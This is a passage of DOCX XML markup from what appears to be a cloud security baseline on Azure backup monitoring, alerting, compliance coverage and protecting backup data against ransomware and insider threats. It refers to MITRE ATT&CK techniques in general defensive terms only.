    <w:p w14:paraId="5BEA37EA" w14:textId="77777777" w:rsidR="00E310AB" w:rsidRDefault="00E310AB" w:rsidP="00E310AB"/>
    <w:p w14:paraId="7376CCDF" w14:textId="77777777" w:rsidR="00E310AB" w:rsidRDefault="00E310AB" w:rsidP="00E310AB"/>
    <w:p w14:paraId="61AC947B" w14:textId="4BD4B772" w:rsidR="00E310AB" w:rsidRDefault="00E310AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E310AB">
        <w:t>Security incidents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F940FE" w14:textId="7CA77E62" w:rsidR="00E310AB" w:rsidRDefault="00E310AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="314"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E310AB">
        <w:t>Unauthorized backup access, deletion, or configuration changes occur without detection indicating potential security compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5D2A58" w14:textId="77777777" w:rsidR="00EA6627" w:rsidRDefault="00EA6627" w:rsidP="00EA6627"/>
    <w:p w14:paraId="6B778B9C" w14:textId="4A43954D" w:rsidR="00E310AB" w:rsidRDefault="00E310AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="313"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E310AB">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBA0907" w14:textId="739EEF5A" w:rsidR="00E310AB" w:rsidRDefault="00E310AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E310AB">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074451C0" w14:textId="41C60212" w:rsidR="00EA6627" w:rsidRDefault="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="447"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t>impair defenses (T1562) disabling backup monitoring to hide malicious activity targeting backup systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772D825C" w14:textId="240E3800" w:rsidR="00E310AB" w:rsidRDefault="00E310AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E310AB">
        <w:t>Impact (TA0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F2664B" w14:textId="2906D63E" w:rsidR="00EA6627" w:rsidRDefault="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="447"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t>inhibit system recovery (T1490) silently corrupting or deleting backups over time before executing destructive attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76654665" w14:textId="56035633" w:rsidR="001E57C3" w:rsidRDefault="001E57C3" w:rsidP="001E57C3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E57C3">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>BR-3.1: Monitor backup health and operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D28BFD" w14:textId="6153EF30" w:rsidR="001E57C3" w:rsidRDefault="001E57C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="315"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E57C3">
        <w:t>Monitor backup system reliability through centralized observability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22602D2B" w14:textId="0D7D957F" w:rsidR="001E57C3" w:rsidRDefault="001E57C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E57C3">
        <w:t>Implement centralized monitoring of backup operations tracking job status, failures, and performance ensuring backup reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B49170" w14:textId="32B44145" w:rsidR="001E57C3" w:rsidRDefault="001E57C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="315"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E57C3">
        <w:lastRenderedPageBreak/>
        <w:t>Backup health monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4714C562" w14:textId="6CC2A10D" w:rsidR="001E57C3" w:rsidRDefault="001E57C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E57C3">
        <w:t>Enable Azure Backup reports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8B108E" w14:textId="1F8099AC" w:rsidR="001E57C3" w:rsidRDefault="001E57C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E57C3">
        <w:t>Configure Azure Backup Reports using Log Analytics workspace providing centralized visibility into backup jobs, storage consumption, and protected items across subscriptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049587F2" w14:textId="287F3655" w:rsidR="001E57C3" w:rsidRDefault="001E57C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E57C3">
        <w:t>Implement Backup Center</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E244349" w14:textId="7AF29A08" w:rsidR="001E57C3" w:rsidRDefault="001E57C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E57C3">
        <w:t>Use Azure Backup Center for unified backup management and monitoring providing single interface for backup estate governance across Recovery Services vaults.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1332495B" w14:textId="3B87DC38" w:rsidR="001E57C3" w:rsidRDefault="001E57C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E57C3">
        <w:t>Configure job monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B56325" w14:textId="1CAD62E8" w:rsidR="001E57C3" w:rsidRDefault="001E57C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E57C3">
        <w:t>Track backup job completion status, duration, and failure rates identifying performance degradation and reliability issues requiring investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4B1DE9" w14:textId="115D3874" w:rsidR="00BC63FD" w:rsidRDefault="00BC63FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC63FD">
        <w:t>Monitor storage consumption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B093D6E" w14:textId="30281CD0" w:rsidR="00BC63FD" w:rsidRDefault="00BC63FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC63FD">
        <w:t>Track backup storage growth and capacity utilization forecasting storage requirements and preventing capacity exhaustion impacting backup success.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAC8427" w14:textId="77777777" w:rsidR="00CA2867" w:rsidRDefault="00CA2867" w:rsidP="00CA2867"/>
    <w:p w14:paraId="5F6BFF93" w14:textId="77777777" w:rsidR="00CA2867" w:rsidRDefault="00CA2867" w:rsidP="00CA2867"/>
    <w:p w14:paraId="3F5D17E0" w14:textId="77777777" w:rsidR="00EA6627" w:rsidRDefault="00EA6627" w:rsidP="00CA2867"/>
    <w:p w14:paraId="63CA414F" w14:textId="5FE538B6" w:rsidR="00CA2867" w:rsidRDefault="00CA2867">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="315"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2867">
        <w:t>Alert configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4A4EA7" w14:textId="044B7B7B" w:rsidR="00CA2867" w:rsidRDefault="00CA2867">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2867">
        <w:t>Configure critical failure alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD14937" w14:textId="49FD3F9A" w:rsidR="00CA2867" w:rsidRDefault="00CA2867">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="317"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2867">
        <w:t>Create Azure Monitor alerts for backup job failures, snapshot failures, and replication errors ensuring immediate notification of protection issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB14CD9" w14:textId="0A2D0C40" w:rsidR="00CA2867" w:rsidRDefault="00CA2867">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2867">
        <w:t>Implement health alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728C755B" w14:textId="7671880C" w:rsidR="00CA2867" w:rsidRDefault="00CA2867">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="317"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2867">
        <w:t>Configure alerts for Recovery Services vault health issues including connectivity problems, authentication failures, and service degradation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66233A6D" w14:textId="0470A304" w:rsidR="00CA2867" w:rsidRDefault="00CA2867">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2867">
        <w:t>Define alert routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C238B67" w14:textId="561DF0D9" w:rsidR="00CA2867" w:rsidRDefault="00CA2867">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="317"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2867">
        <w:t>Establish alert routing rules directing backup notifications to appropriate teams based on severity, resource type, and organizational structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0229C16A" w14:textId="151F8269" w:rsidR="00CA2867" w:rsidRDefault="00CA2867">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2867">
        <w:t>Set alert thresholds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A19656" w14:textId="7E596B58" w:rsidR="00CA2867" w:rsidRDefault="00CA2867">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="317"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2867">
        <w:lastRenderedPageBreak/>
        <w:t>Define acceptable failure rates and alert thresholds avoiding alert fatigue while ensuring critical issues receive immediate attention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115058CD" w14:textId="449DEC6C" w:rsidR="00C855F7" w:rsidRDefault="00C855F7" w:rsidP="00C855F7">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>BR-3.2: Monitor backup compliance and coverage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E858313" w14:textId="2E7939E9" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="318"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Validate protection compliance through continuous monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2774572E" w14:textId="219A9B30" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Implement compliance monitoring ensuring all business-critical resources maintain required backup protection meeting organizational policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D80C66" w14:textId="013EC34F" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="318"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Compliance monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D4B73C" w14:textId="75A7107F" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Leverage Azure Policy compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B812F07" w14:textId="053ED80E" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="319"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Monitor Azure Policy compliance dashboards tracking resources with missing or misconfigured backup protection identifying coverage gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC283AF" w14:textId="08533DB7" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Implement backup coverage reports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5B3554" w14:textId="5402406F" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="319"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Generate regular reports showing backup protection status across resource types, subscriptions, and resource groups quantifying coverage percentages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CA8B30" w14:textId="2740FF74" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Track policy exemptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE89227" w14:textId="1AA64AB1" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="319"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Monitor backup policy exemptions ensuring documented business justification and regular review preventing exemption abuse weakening protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524B3909" w14:textId="77777777" w:rsidR="00C855F7" w:rsidRDefault="00C855F7" w:rsidP="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36D0D8C7" w14:textId="77777777" w:rsidR="00C855F7" w:rsidRDefault="00C855F7" w:rsidP="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3357445A" w14:textId="535A8FC8" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Audit configuration changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFF4FDF" w14:textId="71C167EE" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="319"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Track backup configuration changes including retention policy modifications, backup schedule adjustments, and protection disablement identifying unauthorized changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56451525" w14:textId="57AF35E6" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="318"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Operational monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC495B3" w14:textId="6E12E9F9" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Monitor last backup age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC0F670" w14:textId="1143F50B" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="320"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Track time since last successful backup for each protected resource identifying stale backups indicating protection degradation or service issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B91AC5" w14:textId="424A582B" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Review</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C855F7">
        <w:t xml:space="preserve"> recovery point objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66716DD6" w14:textId="16B0E311" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="320"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:lastRenderedPageBreak/>
        <w:t>Compare actual backup frequency against defined RPO requirements identifying resources failing to meet business continuity objectives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9692E7" w14:textId="737D69A6" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Track backup consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9B6687" w14:textId="33C2B930" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="320"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Monitor application-consistent backup success rates for VMs and databases ensuring backup quality meets recovery requirements beyond file-level consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5543A817" w14:textId="758A9923" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Identify unprotected resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683F01F6" w14:textId="165B49D1" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="320"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Regularly scan subscriptions for business-critical resources without backup protection using resource tagging and classification identifying coverage gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ABD158" w14:textId="77777777" w:rsidR="00C855F7" w:rsidRDefault="00C855F7" w:rsidP="00C855F7"/>
    <w:p w14:paraId="16BCA3DA" w14:textId="3B66E736" w:rsidR="00C855F7" w:rsidRDefault="00C855F7" w:rsidP="00C855F7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc242449576"/>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Backup data protection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w14:paraId="03CD7B0F" w14:textId="22F6BCA5" w:rsidR="00C855F7" w:rsidRDefault="00C855F7" w:rsidP="00C855F7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_Toc242449577"/>
      <w:r w:rsidRPr="00C855F7">
        <w:t>BR-2: Protect backup and recovery data</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
    </w:p>
    <w:p w14:paraId="42F3E8BC" w14:textId="368D2886" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="321"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399182FA" w14:textId="49BBA086" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Protect backup data and operations through multi-layered security controls including access restrictions, encryption, immutability, and geographic redundancy. Implement defense-in-depth protecting backup infrastructure from ransomware, malicious deletion, unauthorized access, and regional disasters ensuring recovery capability when needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2462C467" w14:textId="070E9DEB" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="321"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C855F7">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0FF2DAA9" w14:textId="07EFE710" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Ransomware backup encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E17B4BB" w14:textId="6C522A06" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="322"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Advanced ransomware targets backup systems encrypting or deleting backup copies eliminating recovery options forcing ransom payment or permanent data loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06886AA7" w14:textId="10F68C89" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Malicious backup deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336414D2" w14:textId="2A5E25B0" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="322"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Attackers with compromised credentials delete backup copies before executing destructive attacks preventing incident recovery and maximizing damage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C960BD" w14:textId="6D7D1761" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Insider threat data exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0441F941" w14:textId="7B577B13" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="322"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:lastRenderedPageBreak/>
        <w:t>Malicious insiders with backup access exfiltrate sensitive data through backup systems bypassing production data access controls and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7959CA14" w14:textId="042F578E" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C855F7">
        <w:t>Accidental backup corruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2837DF29" w14:textId="21EBA828" w:rsidR="00C855F7" w:rsidRDefault="00C855F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
